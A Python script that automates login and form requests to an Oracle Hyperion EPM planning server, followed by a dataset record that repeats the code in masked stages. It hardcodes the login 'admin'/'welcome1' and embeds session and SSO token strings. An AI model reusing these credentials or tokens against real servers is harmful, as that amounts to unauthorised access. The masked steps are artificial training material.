"sso_token": "sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=",
"themeSelection": "Skyros",
"""
logger.info ("planning_session: 开始测试请求")
postUrl = "%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp" % serverUrl
postData={
"accessibilityMode": "false",
"bpm.contentheight": "621",
"bpm.contentwidth": "1314",
"bpm.objectpaletteheight": "648",
"bpm.objectpalettewidth": "207",
"cluster": "PLANNING_LWA",
"instance": "7",
"LOCALE_LANGUAGE": "zh_CN",
"mru_id": f"PLANNING_LWA_{plan_name}:application",
"repository_token": s.cookies.get("ORA_EPMWS_session"),
"rightToLeft": "false",
"sourceApp": plan_name,
"sso_token": s.headers.get("_sso_token"),
"themeSelection": "Skyros",
}
responseRes = s.post(postUrl, data=postData)
# logger.info(f"dyn: 响应text:{responseRes.text}")
logger.info(f"planning_session: 响应cookie:{responseRes.cookies}")
# 手动添加两个cookie
s.cookies.set("ORA_HP_MRUApplication", plan_name, path="/HyperionPlanning/", domain=host)
s.cookies.set("ORA_HP_MRUUsername", s.cookies.get("ORA_EPMWS_User"), path="/HyperionPlanning/", domain=host)
logger.info("当前的header为: " + str(s.headers))
logger.info("当前的cookie为: " + str(s.cookies))
# logger.info(f"planning_session: 响应:{responseRes.text}")
# 访问一个具体的表单
import re
def request_planning_table():
# 下面的数据都是写死的, 只适用于JSTI->A0000主要指标表
s.headers["Adf-Ads-Page-Id"] = "2"
s.headers["Adf-Rich-Message"] = "true"
url = serverUrl + "/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state="
response = s.post(url + "14hssan6gi_4",
data="p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn")
# 从输出的结果看被重定向了
logger.info(response.content)
# m = re.search(r"_adf\.ctrl-state=.+?&", response.text)
# current = m.group(0).split("=")[1].replace("&", "")
#
# response = s.post(url + current,
# data="p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn")
#
# logger.info(response.content)
if __name__ == "__main__":
# 从返回结果来看,有登录成功
workspaceLogon("admin", "welcome1")
request_dyn()
request_planning_session("JSTI")
request_planning_table()
# logger.info("sso_token = %s" % sso_token)
# logger.info("sso_token = %s" % sso_token)
# logger.info("assertertoken = %s" % assertertoken)
# request_dyn(sso_token,assertertoken)
# requestHSS("tYy6FOvH4ZhJR1CUTy83Q9ZJxiNnYbnAt8fjWcMBII4rEmQlYjth+/M4MLIXVuXp7Hi3xQS4+QRySoxvNuFibcGbxbIYRVLFVKogwyhtIAcvtIXMvfhxd8svcLZgIXyTklurCsTarP9KtRgc26B3XRWlDG/QAzVLWyGH26ROffQpUj+bW6yRrj7A0udq1PbqGFXjDZ9iNW0ALbg0Z5NC7g3pBgjtetBohXRmpV32DCw4tI1Y7j7tLnHtSFk/NtdNri5AAFCTqTPd6HYdBzbCDqfP7ZEdfeXJFsfatRE5Pcgqm36hV1U7HeDENhTvNBtZiiQ9OfMdopyHQQvPnBQsyfKzSKTq1O5bSHH9HzQfCJdvq/nkSbalctY2SxIb0vtefJ9fUZ2y4bMAm/g95EZLiKZ5aouVrzOKjt8sl1zVctk+Ivg141wUPqtTULOYdBoi")
|
normal
|
{
"blob_id": "c5d92ec592250d5bc896d32941364b92ff1d21e9",
"index": 3793,
"step-1": "<mask token>\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\n<mask token>\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef workspaceLogon(account, password):\n logger.info('logon: 开始模拟登录workspace')\n postUrl = '%sworkspace/logon' % serverUrl\n postData = {'sso_username': account, 'sso_password': password}\n try:\n responseRes = s.post(postUrl, data=postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError('登录失败: 网络异常, 请检查服务器地址配置')\n logger.info('登录返回: ' + responseRes.text)\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n assertertoken_ = {'ora_epm_ctg': assertertoken}\n updateHeaders(assertertoken_)\n token = {'_sso_token': sso_token}\n updateHeaders(token)\n CSRF = responseRes.headers.get('X-ORACLE-BPMUI-CSRF')\n csrf_ = {'X-ORACLE-BPMUI-CSRF': CSRF}\n updateHeaders(csrf_)\n ECID = responseRes.headers.get('X-ORACLE-DMS-ECID')\n h = {'X-ORACLE-DMS-ECID': ECID}\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f'更新请求头: {h}')\n s.headers.update(h)\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\n<mask token>\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogger.setLevel(logging.INFO)\n<mask token>\nconsole.setLevel(logging.INFO)\nconsole.setFormatter(formatter)\nlogger.addHandler(console)\n<mask token>\ns.headers.update({'User-Agent': userAgent})\ns.headers.update({'Referer': serverUrl})\ns.headers.update({'Host': host})\n\n\ndef workspaceLogon(account, password):\n logger.info('logon: 开始模拟登录workspace')\n postUrl = '%sworkspace/logon' % serverUrl\n postData = {'sso_username': account, 'sso_password': password}\n try:\n responseRes = s.post(postUrl, data=postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError('登录失败: 网络异常, 请检查服务器地址配置')\n logger.info('登录返回: ' + responseRes.text)\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n assertertoken_ = {'ora_epm_ctg': assertertoken}\n updateHeaders(assertertoken_)\n token = {'_sso_token': sso_token}\n updateHeaders(token)\n CSRF = responseRes.headers.get('X-ORACLE-BPMUI-CSRF')\n csrf_ = {'X-ORACLE-BPMUI-CSRF': CSRF}\n updateHeaders(csrf_)\n ECID = responseRes.headers.get('X-ORACLE-DMS-ECID')\n h = {'X-ORACLE-DMS-ECID': ECID}\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f'更新请求头: {h}')\n s.headers.update(h)\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\n<mask token>\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\nif __name__ == '__main__':\n workspaceLogon('admin', 'welcome1')\n request_dyn()\n request_planning_session('JSTI')\n request_planning_table()\n",
"step-4": "import requests\nfrom urllib.parse import quote\nimport logging\nfrom urllib.parse import urlparse\nlogger = logging.getLogger(__name__)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter(fmt=\n '%(asctime)s %(filename)s[line:%(lineno)d]%(levelname)s - %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nconsole.setFormatter(formatter)\nlogger.addHandler(console)\nuserAgent = (\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n )\nserverUrl = 'http://epm.huaxinglu72hao.com/'\nhost = 'epm.huaxinglu72hao.com'\ns = requests.Session()\ns.headers.update({'User-Agent': userAgent})\ns.headers.update({'Referer': serverUrl})\ns.headers.update({'Host': host})\n\n\ndef workspaceLogon(account, password):\n logger.info('logon: 开始模拟登录workspace')\n postUrl = '%sworkspace/logon' % serverUrl\n postData = {'sso_username': account, 'sso_password': password}\n try:\n responseRes = s.post(postUrl, data=postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError('登录失败: 网络异常, 请检查服务器地址配置')\n logger.info('登录返回: ' + responseRes.text)\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n assertertoken_ = {'ora_epm_ctg': assertertoken}\n updateHeaders(assertertoken_)\n token = {'_sso_token': sso_token}\n updateHeaders(token)\n CSRF = responseRes.headers.get('X-ORACLE-BPMUI-CSRF')\n csrf_ = {'X-ORACLE-BPMUI-CSRF': CSRF}\n updateHeaders(csrf_)\n ECID = responseRes.headers.get('X-ORACLE-DMS-ECID')\n h = {'X-ORACLE-DMS-ECID': ECID}\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f'更新请求头: {h}')\n s.headers.update(h)\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 'rightToLeft': 'false',\n 'accessibilityMode': 'false', 